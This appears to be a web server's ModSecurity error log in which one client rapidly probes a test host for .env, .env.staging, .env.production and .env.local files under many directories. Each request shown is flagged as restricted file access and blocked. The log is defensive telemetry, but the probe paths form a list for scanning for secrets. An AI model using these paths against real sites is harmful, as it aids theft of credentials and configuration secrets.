[Sat Mar 21 04:10:46.657531 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.staging"] [unique_id "ab4MNicEfGZAHyIZnYBwMAAAAAQ"]
[Sat Mar 21 04:10:46.657744 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.staging"] [unique_id "ab4MNicEfGZAHyIZnYBwMAAAAAQ"]
[Sat Mar 21 04:10:46.657928 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.staging"] [unique_id "ab4MNicEfGZAHyIZnYBwMAAAAAQ"]
[Sat Mar 21 04:10:47.065340 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.staging"] [unique_id "ab4MNycEfGZAHyIZnYBwMQAAAAQ"]
[Sat Mar 21 04:10:47.065498 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.staging"] [unique_id "ab4MNycEfGZAHyIZnYBwMQAAAAQ"]
[Sat Mar 21 04:10:47.065640 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.staging"] [unique_id "ab4MNycEfGZAHyIZnYBwMQAAAAQ"]
[Sat Mar 21 04:10:47.416368 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.production"] [unique_id "ab4MNycEfGZAHyIZnYBwMgAAAAQ"]
[Sat Mar 21 04:10:47.416519 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.production"] [unique_id "ab4MNycEfGZAHyIZnYBwMgAAAAQ"]
[Sat Mar 21 04:10:47.416653 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.production"] [unique_id "ab4MNycEfGZAHyIZnYBwMgAAAAQ"]
[Sat Mar 21 04:10:47.735431 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "ab4MNycEfGZAHyIZnYBwMwAAAAQ"]
[Sat Mar 21 04:10:47.735587 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "ab4MNycEfGZAHyIZnYBwMwAAAAQ"]
[Sat Mar 21 04:10:47.735730 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "ab4MNycEfGZAHyIZnYBwMwAAAAQ"]
[Sat Mar 21 04:10:48.030461 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.local"] [unique_id "ab4MOCcEfGZAHyIZnYBwNAAAAAQ"]
[Sat Mar 21 04:10:48.030634 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.local"] [unique_id "ab4MOCcEfGZAHyIZnYBwNAAAAAQ"]
[Sat Mar 21 04:10:48.030783 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.local"] [unique_id "ab4MOCcEfGZAHyIZnYBwNAAAAAQ"]
[Sat Mar 21 04:10:48.336075 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.staging"] [unique_id "ab4MOCcEfGZAHyIZnYBwNQAAAAQ"]
[Sat Mar 21 04:10:48.336249 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.staging"] [unique_id "ab4MOCcEfGZAHyIZnYBwNQAAAAQ"]
[Sat Mar 21 04:10:48.336388 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.staging"] [unique_id "ab4MOCcEfGZAHyIZnYBwNQAAAAQ"]
[Sat Mar 21 04:10:48.634720 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lms/.env"] [unique_id "ab4MOCcEfGZAHyIZnYBwNgAAAAQ"]
[Sat Mar 21 04:10:48.634938 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lms/.env"] [unique_id "ab4MOCcEfGZAHyIZnYBwNgAAAAQ"]
[Sat Mar 21 04:10:48.635118 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lms/.env"] [unique_id "ab4MOCcEfGZAHyIZnYBwNgAAAAQ"]
[Sat Mar 21 04:10:48.943210 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "ab4MOCcEfGZAHyIZnYBwNwAAAAQ"]
[Sat Mar 21 04:10:48.943418 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "ab4MOCcEfGZAHyIZnYBwNwAAAAQ"]
[Sat Mar 21 04:10:48.943566 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "ab4MOCcEfGZAHyIZnYBwNwAAAAQ"]
[Sat Mar 21 04:10:49.387838 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.staging"] [unique_id "ab4MOScEfGZAHyIZnYBwOAAAAAQ"]
[Sat Mar 21 04:10:49.388010 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.staging"] [unique_id "ab4MOScEfGZAHyIZnYBwOAAAAAQ"]
[Sat Mar 21 04:10:49.388163 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.staging"] [unique_id "ab4MOScEfGZAHyIZnYBwOAAAAAQ"]
[Sat Mar 21 04:10:49.710757 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.local"] [unique_id "ab4MOScEfGZAHyIZnYBwOQAAAAQ"]
[Sat Mar 21 04:10:49.710970 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.local"] [unique_id "ab4MOScEfGZAHyIZnYBwOQAAAAQ"]
[Sat Mar 21 04:10:49.711141 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.local"] [unique_id "ab4MOScEfGZAHyIZnYBwOQAAAAQ"]
[Sat Mar 21 04:10:50.062062 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.staging"] [unique_id "ab4MOicEfGZAHyIZnYBwOgAAAAQ"]
[Sat Mar 21 04:10:50.062223 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.staging"] [unique_id "ab4MOicEfGZAHyIZnYBwOgAAAAQ"]
[Sat Mar 21 04:10:50.062398 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.staging"] [unique_id "ab4MOicEfGZAHyIZnYBwOgAAAAQ"]
[Sat Mar 21 04:10:50.406902 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "ab4MOicEfGZAHyIZnYBwOwAAAAQ"]
[Sat Mar 21 04:10:50.407145 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "ab4MOicEfGZAHyIZnYBwOwAAAAQ"]
[Sat Mar 21 04:10:50.407349 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "ab4MOicEfGZAHyIZnYBwOwAAAAQ"]
[Sat Mar 21 04:10:50.701758 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "ab4MOicEfGZAHyIZnYBwPAAAAAQ"]
[Sat Mar 21 04:10:50.701924 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "ab4MOicEfGZAHyIZnYBwPAAAAAQ"]
[Sat Mar 21 04:10:50.702057 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "ab4MOicEfGZAHyIZnYBwPAAAAAQ"]
[Sat Mar 21 04:10:51.003151 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.production"] [unique_id "ab4MOycEfGZAHyIZnYBwPQAAAAQ"]
